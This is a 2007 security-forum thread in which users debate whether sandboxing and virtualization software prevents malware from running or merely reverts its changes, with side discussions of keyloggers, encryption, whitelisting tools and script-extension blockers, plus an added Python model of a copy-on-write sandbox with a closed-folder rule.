-{ Quote: "Actually Erik, that is quite true. If you look at VMware's website, very little is said about malware compared to the many other applications. Most of the software you have tried was probably developed and tested on a VM machine. It for example allows a developer to test a new driver, and if it crashes the machine, it doesn't prevent them from doing other things on the host. Lots of applications.
Pete" }-
Peter, I'm only trying to find out what virtualization softwares are worth by asking questions. IMO they don't stop the execution of malware at all, they only REMOVE them. That's recovery, not security. :)
lucas1985
May 14th, 2007, 05:00 PM
-{ Quote: "These developers of virtualization softwares would save me a lot of time, if they described their softwares in an objective way and told the full truth: what it does and above all what it does not do. It would save me a lot of posts as well. :)" }-
You need to differentiate technical data from marketing data. According to the marketing data from AV vendors, you shouldn't need more than an AV and a firewall to be hack-proof/malware-proof.
In simple terms:
- If the virtualization solution allows everything inside it, things don't get broken. Extreme case: VMware/Virtualbox. They're so flexible that they allow an OS to be installed.
- If the virtualization solution doesn't allow everything, things start to break. You can't install an app which requires kernel drivers/services inside Sandboxie.
If the guest is completely separated from the host, the virtualization solution is perfect. That's why no known malware can do any harm if it's executed inside Sandboxie (although I prefer Geswall)
But malware can have access to data inside the sandbox (i.e. the browser cache, cookies), so you're still exposed to identity fraud.
-{ Quote: "What happens when a malware is sandboxed and the malware is supposed to steal private info.
Will Sandboxie allow this or not ? That's the crucial question. If Sandboxie allows it, the harm is done and you can't revert that." }-
The answer (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):
-{ Quote: "Answering your original question: Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information. This prevents access to, for example, My Documents by sandboxed/isolated browser and objects created inside the sandbox
- Harden the security of the browser (NoScript, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS). This prevents against this threat (http://www.wilderssecurity.com/showthread.php?t=174195)" }-
ErikAlbert
May 14th, 2007, 05:30 PM
Lucas,
In other words, if I don't encrypt my private data, Sandboxie will allow a malware to steal it.
lucas1985
May 14th, 2007, 05:43 PM
Encrypt it and/or use the Closed File Path (http://www.sandboxie.com/index.php?ClosedFilePath) setting.
Franklin
May 14th, 2007, 05:45 PM
The "paper metaphor" from Sandboxie FAQ:
-{ Quote: "What is Sandboxie and how is it different than other solutions?
Think of your PC as a piece of paper. Every program you run writes on the paper. When you run your browser, it writes on the paper about every site you visited. And any malware you come across will usually try to write itself into the paper.
Traditional privacy and anti-malware software try to locate and erase any writings they think you wouldn't want on the paper. Most of the times they get it right. But first the makers of these solutions must teach the solution what to look for on the paper, and also how to erase it safely.
On the other hand, the Sandboxie sandbox works like a transparency layer placed over the paper. Programs write on the transparency layer and to them it looks like the real paper. When you delete the sandbox, it's like removing the transparency layer, the unchanged, real paper is revealed. " }-
And regarding keyloggers:
-{ Quote: "Will Sandboxie protect me from malicious key-loggers?
Yes, to some extent. First of all, your system (outside the sandbox) must not have been already compromised by an installed key-logger. Sandboxie can not protect against key-loggers that are already running outside the sandbox.
You may want to consider always browsing sandboxed, so you don't accidentally get any key-loggers into your system.
It is very difficult to reliably detect a key-logger. For a lengthy explanation, please see DetectingKeyLoggers. So the most important tool Sandboxie offers you for protection against key-loggers, is to delete the sandbox.
When you stop all sandboxed activity (in all sandboxes), then proceed to delete the sandbox you're about to use, you can be fairly certain that all key-loggers are dead. " }-
Sandboxie FAQ (http://www.sandboxie.com/index.php?FrequentlyAskedQuestions)
flinchlock
May 14th, 2007, 05:46 PM
-{ Quote: "<snip> encrypt my private data <snip>" }-
You may find this Hard Disk Encryption Revisited (http://www.ranum.com/security/computer_security/index.html) interesting about TrueCrypt (http://www.truecrypt.org/)
-{ Quote: "Free open-source disk encryption software for Windows Vista/XP/2000 and Linux" }-
Mike
ErikAlbert
May 14th, 2007, 05:59 PM
-{ Quote: "Encrypt it and/or use the Closed File Path (http://www.sandboxie.com/index.php?ClosedFilePath) setting." }-
-{ Quote: "
[DefaultBox]
ClosedFilePath=!iexplore.exe,%Cookies%
ClosedFilePath=%Personal%
" }-
Terrific solution for housewives. ::)
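Franklin's "transparency layer" description, lucas1985's point that sandboxed code can still read whatever it can see, and the ClosedFilePath lines quoted just above, put together in one added Python model. This is my own illustration, not Sandboxie's code or anything posted in the thread: the Sandbox class, the paths and the file contents are constructed, and the closed-path rule is a simplified stand-in for ClosedFilePath (modelled here only as a case-insensitive directory prefix that blocks both reads and writes).

```python
from __future__ import annotations


class SandboxDenied(PermissionError):
    """A sandboxed program tried to reach a path listed as closed."""


class Sandbox:
    """Copy-on-write view over a real file system (modelled as a dict).

    real    -- the "paper": never modified by sandboxed calls
    overlay -- the "transparency layer": sandboxed writes; None = deleted
    closed  -- directory prefixes a sandboxed program may neither read nor
               write; a toy stand-in for Sandboxie's ClosedFilePath
    """

    def __init__(self, real: dict[str, bytes], closed_paths: list[str] | None = None) -> None:
        self.real = {self._norm(p): d for p, d in real.items()}
        self.overlay: dict[str, bytes | None] = {}
        self.closed = [self._norm(p).rstrip("\\") for p in (closed_paths or [])]

    @staticmethod
    def _norm(path: str) -> str:
        # Windows paths compare case-insensitively; accept either separator
        return path.replace("/", "\\").lower()

    def _guard(self, norm: str) -> None:
        for prefix in self.closed:
            if norm == prefix or norm.startswith(prefix + "\\"):
                raise SandboxDenied(f"closed path: {norm}")

    def read(self, path: str) -> bytes:
        """What a sandboxed program sees: overlay first, then the paper."""
        norm = self._norm(path)
        self._guard(norm)
        if norm in self.overlay:
            data = self.overlay[norm]
            if data is None:
                raise FileNotFoundError(path)   # deleted inside the box
            return data
        if norm not in self.real:
            raise FileNotFoundError(path)
        return self.real[norm]                   # falls through to real file

    def write(self, path: str, data: bytes) -> None:
        norm = self._norm(path)
        self._guard(norm)
        self.overlay[norm] = data                # real dict is never touched

    def delete(self, path: str) -> None:
        norm = self._norm(path)
        self._guard(norm)
        self.overlay[norm] = None                # hides the real file in-box

    def real_read(self, path: str) -> bytes:
        """What the host (outside the sandbox) sees."""
        return self.real[self._norm(path)]

    def delete_sandbox(self) -> None:
        """Remove the transparency layer; the unchanged paper is revealed."""
        self.overlay.clear()


# Constructed sample disk: browser preferences plus a private document.
PREFS = "C:\\Users\\erik\\AppData\\Browser\\prefs.ini"
BANK = "C:\\Users\\erik\\Documents\\bank-login.txt"
CLEAN_PREFS = b"homepage=https://example.org\n"
HIJACKED_PREFS = b"homepage=http://hijacked.invalid\n"


def make_disk() -> dict[str, bytes]:
    return {PREFS: CLEAN_PREFS, BANK: b"customer-number=CONSTRUCTED-SAMPLE\n"}


def demo_open_sandbox() -> dict[str, object]:
    """Default box: changes are contained and reverted, but reads of user
    data still succeed, which is the privacy gap discussed in the thread."""
    box = Sandbox(make_disk())
    box.write(PREFS, HIJACKED_PREFS)          # sandboxed "homepage hijack"
    hijacked_in_box = box.read(PREFS)
    real_disk = box.real_read(PREFS)          # paper unchanged
    leaked = box.read(BANK)                   # overlay does not stop reads
    box.delete(BANK)
    try:
        box.read(BANK)
        deleted_in_box = False
    except FileNotFoundError:
        deleted_in_box = True                 # gone in-box, still on disk
    box.delete_sandbox()                      # "flush the sandbox"
    return {"hijacked_in_box": hijacked_in_box, "real_disk": real_disk,
            "leaked": leaked, "deleted_in_box": deleted_in_box,
            "after_flush": box.read(PREFS), "bank_on_disk": box.real_read(BANK)}


def demo_closed_path() -> dict[str, object]:
    """Same box with the Documents folder closed: reads and writes there are
    denied, other sandboxed activity is unaffected."""
    box = Sandbox(make_disk(), closed_paths=["C:\\Users\\erik\\Documents"])
    try:
        box.read(BANK)
        read_denied = False
    except SandboxDenied:
        read_denied = True
    try:
        box.write("c:/users/erik/documents/new.txt", b"x")   # odd case, odd slashes
        write_denied = False
    except SandboxDenied:
        write_denied = True
    box.write("C:\\Users\\erik\\Documents2\\note.txt", b"ok")  # sibling dir: not closed
    box.write(PREFS, HIJACKED_PREFS)
    return {"read_denied": read_denied, "write_denied": write_denied,
            "prefs_in_box": box.read(PREFS)}
```

The open-box demo shows why the thread separates recovery from security: the hijacked preference and the deleted file exist only in the overlay and vanish when the sandbox is flushed, yet the private file was readable the whole time. The closed-path demo shows what a ClosedFilePath-style rule adds: the sensitive folder is unreachable from inside the box, while the sandbox keeps containing everything else.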
ErikAlbert
May 14th, 2007, 06:03 PM
-{ Quote: "You may find this Hard Disk Encryption Revisited (http://www.ranum.com/security/computer_security/index.html) interesting about TrueCrypt (http://www.truecrypt.org/)
Mike" }-
I know TrueCrypt already and ditched it when I discovered that TC only protects me against physical theft, not on-line theft.
Once the encrypted container or volume is mounted, you are vulnerable for on-line theft.
I expected from encryption something else.
solcroft
May 14th, 2007, 06:05 PM
-{ Quote: "Lucas,
In other words, if I don't encrypt my private data, Sandboxie will allow a malware to steal it." }-
Do you usually store your private data in plaintext on your hard disk? :blink:
ErikAlbert
May 14th, 2007, 06:10 PM
-{ Quote: "Do you usually store your private data in plaintext on your hard disk? :blink:" }-
I don't have any PERSONAL private data on my harddisk.
And the recent complicated login procedure of my online-banking makes any keylogger useless.
solcroft
May 14th, 2007, 06:20 PM
-{ Quote: "I don't have any PERSONAL private data on my harddisk.
And the recent complicated login procedure of my online-banking makes any keylogger useless." }-
So why all the fuss about preventing data theft, if it doesn't affect you? ;)
SandboxIE stops SOME form of keyloggers, but not all, since it's a form of incomplete virtualization. Complete virtualization will utterly fail against all types of keylogging attacks - but then, they can only steal whatever's in the virtual machine, and are unable to touch anything on the host. To hopefully stop the bush-beating, if an anti-keylogger solution is what you're after: there are three main methods to stop them. At execution (don't run suspicious programs), at where it injects global hooks or monitors APIs (use a good HIPS program), and at where it transmits data (use an outbound firewall). Any one of them should do the trick.
ErikAlbert
May 14th, 2007, 06:26 PM
-{ Quote: "So why all the fuss about preventing data theft, if it doesn't affect you? ;)" }-
I'm not working for myself only.
I already said that I don't need anti-keylogger solution. Keyloggers can't catch my bank password, it changes constantly.
solcroft
May 14th, 2007, 06:35 PM
-{ Quote: "I'm not working for myself only." }-
Then hopefully you'll find one of the solutions listed above useful for protecting whatever data you need to.
ErikAlbert
May 14th, 2007, 06:48 PM
-{ Quote: "Then hopefully you'll find one of the solutions listed above useful for protecting whatever data you need to." }-
At first sight, I don't need virtualization softwares. They don't prevent the execution of malwares, they remove it and I have already a removal solution.
I'm looking for softwares that stop the execution of malware, nothing else.
Thanks EVERYBODY !!!
solcroft
May 14th, 2007, 06:53 PM
-{ Quote: "At first sight, I don't need virtualization softwares. They don't prevent the execution of malwares, they remove it and I have already a removal solution.
I'm looking for softwares that stop the execution of malware, nothing else.
Thanks EVERYBODY !!!" }-
Pardon my asking, but unless you're using an unpatched copy of IE and/or have autorun enabled on your system...
Why do you need software to stop the execution of malware? In what way is not double-clicking on them not working for you?
ErikAlbert
May 14th, 2007, 06:57 PM
-{ Quote: "Pardon my asking, but unless you're using an unpatched copy of IE and/or have autorun enabled on your system...
Why do you need software to stop the execution of malware? In what way is not double-clicking on them not working for you?" }-
Do you mean that ANY kind of infection requires a double-clicking to execute itself ?
solcroft
May 14th, 2007, 07:01 PM
-{ Quote: "Do you mean that ANY kind of infection requires a double-clicking to execute itself ?" }-
Well, erm, if we exclude the two auto-execute vectors mentioned above...
Duh? :blink:
ErikAlbert
May 14th, 2007, 07:05 PM
-{ Quote: "Well, erm, if we exclude the two auto-execute vectors mentioned above...
Duh? :blink:" }-
Only two kinds ? Hard to believe.
How do I recognize a bad object, to avoid double-clicking ?
solcroft
May 14th, 2007, 07:13 PM
-{ Quote: "How do I recognize a bad object, to avoid double-clicking ?" }-
I don't know. That depends a whole lot on how you use your computer and what kinds of files you usually deal with. But applying the same policy as you use to create your Anti-Executable blacklist might be a good start.
I'm pretty sure those are the only two auto-execute vectors. Did I miss any? Depending on what other software you use, they might have vulnerabilities that expose them to arbitrary code execution, but outside of IE, they've been exceedingly rare so far, at least from what I know.
ErikAlbert
May 14th, 2007, 07:25 PM
-{ Quote: "I don't know. That depends a whole lot on how you use your computer and what kinds of files you usually deal with. But applying the same policy as you use to create your Anti-Executable blacklist might be a good start.
" }-
I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)
solcroft
May 14th, 2007, 08:42 PM
-{ Quote: "I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)" }-
If you've scanned your system and made sure it's clean, then all you need to do is be careful of what you download and of files you get from external media. The fact is, Anti-Executable doesn't know what bad executables are either - it just prevents you from running what YOU tell it to block. And if you know what to tell it to block... how hard is it to just not run those same executables?
Peter2150
May 14th, 2007, 08:45 PM
-{ Quote: "Peter, I'm only trying to find out what virtualization softwares are worth by asking questions. IMO they don't stop the execution of malware at all, they only REMOVE them. That's recovery, not security. :)" }-
Erik. A vm machine is just a computer pure and simple. You can do anything with it you can with a computer, including secure it, or leave it unprotected. All you are doing is transferring action and results from the host machine to the vm machine. When it comes to malware, the biggest advantage is what I was able to do when messing with KillDisk. I experimented with recovery, but I didn't need to. All I had to do was revert to a previous snapshot, and it was all fixed. Similar to your recovery concept except my host wasn't involved.
Pete
EASTER.2010
May 14th, 2007, 10:58 PM
-{ Quote: "I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)" }-
@ErikAlbert
Good Day sir.
It's early but what's your impression of ScriptDefender so far. Have you tested it against ANY scripts? Safe ones only of course. Reason I ask is if it covers more boundaries than my ScriptSentry you will have contributed to changing my own coverage for those.
Rmus
May 15th, 2007, 04:01 AM
-{ Quote: "... recovery isn't security." }-
Security
1. freedom from danger, risk, etc.; safety.
2. freedom from care, anxiety, or doubt; well-founded confidence
Synonyms: assurance; safeguard
________________________________________
I can make the case that recovery is a part of a security strategy: in a worst-case scenario - loss of the computer by fire or theft - knowing I can recover my files from an off-site backup gives me "well-founded confidence" and "freedom from care, anxiety." My files are secured.
-{ Quote: "Keeping your harddisk UNCHANGED has nothing to do with security IMO." }-Reboot-to-restore is also a type of recovery, which I consider to be a significant part of a security strategy. Not just from malware, but from any changes to the system partition. Eg: corrupted files - once happened to me - Secedit.sdb - an error message just popped up while I was typing. It turned out to be a "Corrupt Group Policy Database File" - not uncommon with Win2K. Being able to reboot-to-restore saved me a lot of time from having to go through Microsoft's procedure. I consider that as much a part of security (= keeping secure, safe, unchanged) as protecting against malware.
Actually, a lot of the discussion in this thread has drifted away from your original post about virtualization, in which you stated,
-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk." }-
Don't you think that if you need to "isolate an infection" you are admitting that an infected file had somehow gotten on to your hard drive? Do you really think that could happen with your setup and user common sense?
If you think through the ways an infected file could get on to your hard drive:
1) Through a port. Your Firewall takes care of that
2) Email, either by enticing you to open an infected attachment, or to click on a link. You've indicated many times that you would never get tricked into that
3) Web-based exploits -1: download a trojan by remote code execution. I don't know what browser you use, but if not IE, most of these exploits might not even run. Nonetheless, Anti-Executable takes care of it. Same with any other attempt to sneak in an executable: auto-run on a CD or USB drive, for example.
4) Web-based exploits -2: recent XSS and the sending out of login data: you've made it clear you don't keep personal information on your HD and that your bank's passwords methods are fool-proof.
Aren't you thoroughly covered? How else could an infected file get on to your computer? Give me an example.
In the very unlikely case that would happen, you have your reboot-to-restore solution.
BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file?
5) Trustingly installing a program. The last point of entry of an infected file. Here, I think you are covered, because you are the only person besides myself (unless I've missed it) that holds to this philosophy:
-{ Quote: "All my softwares are legitimate software on CD or downloaded from their homepage.
If you consider legitimate softwares as infected, then my frozen snapshot is indeed infected." }-
I don't see any weaknesses in your setup. Why not just enjoy computing/surfing with what you have and don't be a worry-wart :)
(= tobber?)
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
Huupi
May 15th, 2007, 04:54 AM
-{ Quote: "Security
1. freedom from danger, risk, etc.; safety.
2. freedom from care, anxiety, or doubt; well-founded confidence
Synonyms: assurance; safeguard
________________________________________
I can make the case that recovery is a part of a security strategy: in a worst-case scenario - loss of the computer by fire or theft - knowing I can recover my files from an off-site backup gives me "well-founded confidence" and "freedom from care, anxiety." My files are secured.
Reboot-to-restore is also a type of recovery, which I consider to be a significant part of a security strategy. Not just from malware, but from any changes to the system partition. Eg: corrupted files - once happened to me - Secedit.sdb - an error message just popped up while I was typing. It turned out to be a "Corrupt Group Policy Database File" - not uncommon with Win2K. Being able to reboot-to-restore saved me a lot of time from having to go through Microsoft's procedure. I consider that as much a part of security (= keeping secure, safe, unchanged) as protecting against malware.
Actually, a lot of the discussion in this thread has drifted away from your original post about virtualization, in which you stated,
Don't you think that if you need to "isolate an infection" you are admitting that an infected file had somehow gotten on to your hard drive? Do you really think that could happen with your setup and user common sense?
If you think through the ways an infected file could get on to your hard drive:
1) Through a port. Your Firewall takes care of that
2) Email, either by enticing you to open an infected attachment, or to click on a link. You've indicated many times that you would never get tricked into that
3) Web-based exploits -1: download a trojan by remote code execution. I don't know what browser you use, but if not IE, most of these exploits might not even run. Nonetheless, Anti-Executable takes care of it. Same with any other attempt to sneak in an executable: auto-run on a CD or USB drive, for example.
4) Web-based exploits -2: recent XSS and the sending out of login data: you've made it clear you don't keep personal information on your HD and that your bank's passwords methods are fool-proof.
Aren't you thoroughly covered? How else could an infected file get on to your computer? Give me an example.
In the very unlikely case that would happen, you have your reboot-to-restore solution.
BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file?
5) Trustingly installing a program. The last point of entry of an infected file. Here, I think you are covered, because you are the only person besides myself (unless I've missed it) that holds to this philosophy:
I don't see any weaknesses in your setup. Why not just enjoy computing/surfing with what you have and don't be a worry-wart :)
(= tobber?)
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier" }-
I am glad to have such dudes like Erik here on Wilders, he forces us to think and re-think about all that matters, I have learned a lot in those endless threads, thank you all !!
ErikAlbert
May 15th, 2007, 06:26 AM
-{ Quote: "
BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file? " }-
I'm not as knowledgeable as you are and many other members at Wilders.
My knowledge about malware and anti-malware is very poor and I don't see the difference between good and bad objects. So I depend on advice from other members.
They told me in this thread, that Anti-Executable doesn't protect you against these file extensions :
.HTA,.JS,.JSE,.REG,.SHB,.SHS,.VBE,.VBS,.WSF,.WSH
And that's why I added Script Defender (= Extension Defender) to protect me against any extension that isn't included in Anti-Executable.
If you can explain to me that I don't really need Script Defender, I'm prepared to ditch it. The less security softwares I have on my computer, the better.
The original purpose of this thread was to find out, if virtualization could be useful for me or NOT as an additional protection to STOP EXECUTIONS of any kind of infection in order to save the period between TWO reboots.
Installation of infections is not a problem, because I boot-to-restore and nothing can beat that, which also means that I have neither problems with detection of infections, nor problems with removal of infections. It's no secret that scanners sometimes DETECT infections, but fail to REMOVE or only do a PARTIAL removal of the infections. I don't have that problem anymore.
My conclusion is that I don't need virtualization softwares, because they only ISOLATE and REMOVE infections, but they don't stop the execution of infections, maybe a few, but not worth to talk about.
If they would have stopped the execution, then I would have called them security softwares, but that's not the case, they RECOVER by REMOVAL and I have this already, not the same way, but the result is the same.
Even PowerShadow recommends to keep your security softwares on their website. Why ? probably because PowerShadow doesn't stop the execution either or not sufficiently enough.
I only hope that other much more knowledgeable members than me, think about the value and risks of virtualization softwares.
They are nice regarding removal, no doubts about that, but maybe not so nice anymore when they still allow execution.
I agree that you can cover the failures of virtualization softwares with other security softwares, like a firewall to stop the sending of private data over the internet executed by a sandboxed infection, but users have to be aware of this.
I was only talking about virtualization software ITSELF without any other security softwares involved.
Once you know the weaknesses of virtualization softwares, you can solve these weaknesses with other security softwares.
I was just trying to get an idea of the benefits of using virtualization softwares, nothing more than that.
If I was a security expert, I wouldn't be here asking questions. I don't know much about Windows, Internet, Malware and Anti-Malware, but I have my analytical, logical brain and that helps me to solve problems even when I don't know much about the subject.
Many thanks for your last post, which gives a good view of the possible infection sources.
My design is still rough and needs to be polished, but those are unimportant details : a better software setting here and there, a better procedure for installing new softwares or keeping changes, ... whatever. It can't get worse only better and better. :)
Pedro
May 15th, 2007, 10:38 AM
-{ Quote: "
They are nice regarding removal, no doubts about that, but maybe not so nice anymore when they still allow execution.
" }-
"execution" with very restricted rights. Yes. The worst keyloggers don't work, only browser specific vulnerabilities and such should do something.
ErikAlbert
May 15th, 2007, 11:21 AM
-{ Quote: ""execution" with very restricted rights. Yes. The worst keyloggers don't work, only browser specific vulnerabilities and such should do something." }-
If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course.
lucas1985
May 15th, 2007, 05:05 PM
Erik,
An article (http://wiki.castlecops.com/Understanding_Computer_Infections) about how malware can infect computers.
-{ Quote: "If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course." }-
Your logic is flawed. If the sandbox checks every bit of code trying to protect the browser against its own vulnerabilities, it becomes a blacklist scanner. Code can execute (almost) freely inside the sandbox.
-{ Quote: "Terrific solution for housewives. ::)" }-
Installing/configuring Anti-Executable isn't housewives-proof either.
Almost all security software should be installed and configured by a user with some knowledge.
AE and Sandboxie are very user-friendly; once they're properly configured, they don't annoy with cryptic pop-ups/prompts.
Firewalls and execution interceptors (classical HIPS) are the less user-friendly apps among security software.
Pedro
May 15th, 2007, 06:35 PM
-{ Quote: "If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course." }-
Technically I don't know how Tzuk would do it without bloating it. It's not SandboxIE's job to monitor the browser. Its job is preventing anything inside the sandbox from doing harm outside it.
I don't know if AE can prevent that either. Rmus should know the answer though. But I do know that AE could be very uncomfortable to use. I have to turn it off just to do something new.
Note that I like AE's concept too.
Rmus
May 16th, 2007, 12:31 AM
-{ Quote: "Many thanks for your last post, which gives a good view of the possible infection sources." }-You are welcome.
-{ Quote: "I have my analytical, logical brain and that helps me to solve problems even when I don't know much about the subject." }-As an analyst, you would agree, I'm sure, that establishing a set of criteria against which to evaluate data, is a good strategy.
I've often used the phrase, security strategy, which I feel should be one's starting point, and selection of products follows as a result of deciding what type of protection takes care of a specific attack point.
Herbalist says essentially the same thing:
http://www.wilderssecurity.com/showpost.php?p=1004849&postcount=18
-{ Quote: "Most users, even many security conscious ones who run multiple AVs, AS, ATs, HIPS, etc, often don't have one thing that is a necessity. That's a well thought out security policy, that basic plan that spells out how different situations are responded to. The security policy is where it should begin, from the apps you choose and how you configure them to your response to an unknown. Default-deny is an example of a very secure policy, but one few users implement." }-
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
ErikAlbert
May 16th, 2007, 03:14 AM
-{ Quote: "I don't know if AE can prevent that either. Rmus should know the answer though. But I do know that AE could be very uncomfortable to use. I have to turn it off just to do something new.
Note that I like AE's concept too." }-
I like AE's concept too, because it is based on a whitelist and that makes it an evergreen and without daily updatings.
I have two kinds of whitelists :
1. AE's has a whitelist of all executables on my harddisk
2. The Freeze Storage has a whitelist of all objects on my harddisk, including the executables.
The only difference is that :
1. AE reacts immediately when an unauthorized good or bad executable tries to do its job.
2. The Freeze Storage reacts only on reboot, when it restores my frozen snapshot.
As long as I don't reboot, a frozen snapshot allows everything, because FDISR is not a security software.
At this moment AE is on HIGH security, which means that it
1. blocks unauthorized 16-bit executables
2. blocks unauthorized 32-bit executables
3. blocks unauthorized drivers and .dll-files
4. Protects AE's folder from access and tampering.
I did not mark "Delete Prevention" and "Copy Prevention", because I don't need them.
If an authorized executable is deleted or copied, the freeze storage will correct this during reboot, because a freeze storage doesn't allow any change, including executables.
Another more important reason is that FDISR doesn't like both settings, while it is copy/updating a snapshot and this results in errors.
During copy/update FDISR :
1. adds objects
2. deletes objects, which is probably in conflict with AE's "Delete Prevention"
3. replaces objects, which is probably in conflict with AE's "Copy Prevention".
I'm still studying this by observation, but it IS a problem.
AE is indeed uncomfortable, but I consider this as temporary, after a while everything becomes a habit.
Each security setup is uncomfortable, you only forgot the inconveniences, because you got used to them.
I don't know about the other security softwares, but AE is the first security software, I've ever seen, that protects and hides ITSELF so well. Most security softwares are an open book for everybody : good guys, bad guys and evil objects. :)
Pedro
May 16th, 2007, 08:39 AM
-{ Quote: "
Each security setup is uncomfortable, you only forgot the inconveniences, because you got used to them.
" }-
Very true!
ErikAlbert
May 16th, 2007, 11:59 PM
-{ Quote: "It's early but whats your impression of ScriptDefender so far. have you tested it against ANY scripts? Safe ones only of course. Reason i ask is if it covers more boundaries then my ScriptSentry you will have contributed to changing my own coverage for those." }-
I can't test security softwares, because I don't know where to get scripts or any other bad object.
I was lucky to find legitimate .js-files on my own harddisk, so I tried to run one of them and ScriptDefender reacted immediately and that's what I expected.
My opinion about ScriptDefender is :
1. It's simple and easy, all the rest is BAD.
2. It's a 'dangerous' security software, because it won't keep me away from running scripts, good or bad.
How can I choose between "Execute" or "Abort", when I don't even see the difference between a good or bad script. They all look the same to me and the bad guys won't give their scripts a suspicious name either. You see the problem ?
3. It's neither a blacklist or whitelist software, it's a warning software for possible bad file extensions, not for script extensions only, like the name "ScriptDefender" says, but for any extension.
4. It has a bad uninstaller for such a little program, because it doesn't remove the intercepts automatically, while the info is available for the uninstaller.
The bottom line is : I don't like ScriptDefender, too dangerous or at least annoying when I say "Abort" to a legitimate script on my computer.
Anti-Executable is a very safe security software and doesn't ask me "Execute" or "Abort", it simply says "NO" without a choice and each "NO" is RIGHT, until it's whitelisted by myself and I don't install softwares permanently, until I know it's a legitimate software.
I do install any kind of software TEMPORARILY and only two things can happen :
1. The software isn't destructive, but nevertheless 'dangerous'. In that case the software will be removed during reboot.
2. The software is destructive, but
a. doesn't corrupt FDISR. In that case the software will be removed during reboot.
b. does corrupt FDISR. In that case an IMAGE will restore my system partition.
In the future I might do testings with softwares like VMware, but once again I can't do it all at once and I work step by step.
I'm only afraid of hardware infections, but I never saw them until now. :)
EASTER.2010
May 17th, 2007, 12:21 AM
-{ Quote: "Anti-Executable is a very safe security software and doesn't ask me "Execute" or "Abort", it simply says "NO" without a choice and each "NO" is RIGHT, until it's whitelisted by myself and I don't install softwares permanently, until I know it's a legitimate software." }-
I trust your judgement on the results you are confident in with AE, so thanks for the heads up. Like in an earlier post of mine referring to AE, I tried it once and I know it is quite formidable in that it absolutely refuses executables to launch unless you give it explicit permissions to let them.
I'm almost of the mind to follow you on AE but for the time being I'm quite taken, at least for now, with HIPS that also refuse to allow most ANYTHING to launch without on-the-spot permission to do so, but I see your point. How does the average user determine exactly what is safe to let ride from something which could be a danger to the system settings if allowed to go on?
ErikAlbert
May 17th, 2007, 01:26 AM
-{ Quote: "I trust your judgement on the results you are confident in with AE, so thanks for the heads up. Like in an earlier post of mine referring to AE, I tried it once and I know it is quite formidable in that it absolutely refuses executables to launch unless you give it explicit permissions to let them.
I'm almost of the mind to follow you on AE but for the time being I'm quite taken, at least for now, with HIPS that also refuse to allow most ANYTHING to launch without on-the-spot permission to do so, but I see your point. How does the average user determine exactly what is safe to let ride from something which could be a danger to the system settings if allowed to go on?" }-
AE is so good and SENSITIVE, that I can't even move my mouse over an unauthorized executable without getting a warning from AE. This happens a lot on my data partition when I move my mouse over a downloaded legitimate software-installer, which is still not installed permanently. If I want to move my mouse over it and double-click it, I have to turn off AE.
Other users might consider this as very annoying and uncomfortable, but do they want protection or not ? :)
EASTER.2010
May 17th, 2007, 01:45 AM
-{ Quote: "AE is so good and SENSITIVE, that I can't even move my mouse over an unauthorized executable without getting a warning from AE. This happens a lot on my data partition when I move my mouse over a downloaded legitimate software-installer, which is still not installed permanently. If I want to move my mouse over it and double-click it, I have to turn off AE.
Other users might consider this as very annoying and uncomfortable, but do they want protection or not ? :)" }-
I've experienced that exact same thing with Anti-Virus apps. Seems like if my mouse pointer got near a listed (so-called) virus file while scrolling down the page, ALERT!!, up would pop the prompt for action to be taken, so if AE does that it's a very good thing.
Rmus
May 17th, 2007, 03:56 AM
Revisiting Script Defender:
-{ Quote: "They told me in this thread, that Anti-Executable doesn't protect you against these file extensions :
.HTA,.JS,.JSE,.REG,.SHB,.SHS,.VBE,.VBS,.WSF,.WSH" }-If there were a program to block script file types in the way AE does - that is, to create a white list of script file types and block everything else - many web pages would just refuse to load, for the caching/running of the necessary script files would be blocked, in the way that AE blocks any executable from downloading/running.
-{ Quote: "And that's why I added Script Defender (= Extension Defender) to protect me against any extension that isn't included in Anti-Executable.
If you can explain to me that I don't really need Script Defender, I'm prepared to ditch it. The less security softwares I have on my computer, the better." }-I wouldn't want to say that you need or don't need any program - only you can make that decision - which I see you already have.
But starting over: suppose you were thinking about trialling (oops - trial is not a verb) evaluating it:
In learning what a particular program does, and weighing that against your knowledge of how different types of malware can get onto your computer, you can arrive at a decision.
Remember, of course, that SD and similar programs deal with script files already on the HD that are double-clicked, and do not prevent script files being cached and interpreted by the browser (.js, .css, .vbs, etc). So, we can eliminate that scenario in this case.
Consider a script file, 1.bat on the root of C:\
http://www.urs2.net/rsj/computing/imgs/bat_1.gif
When you d-click a file, this tells Windows to pass that file extension to the program
associated with that file type. For example, d-clicking on a *.doc file,
Windows tells MSWord (or your default Word Processor) to open that file.
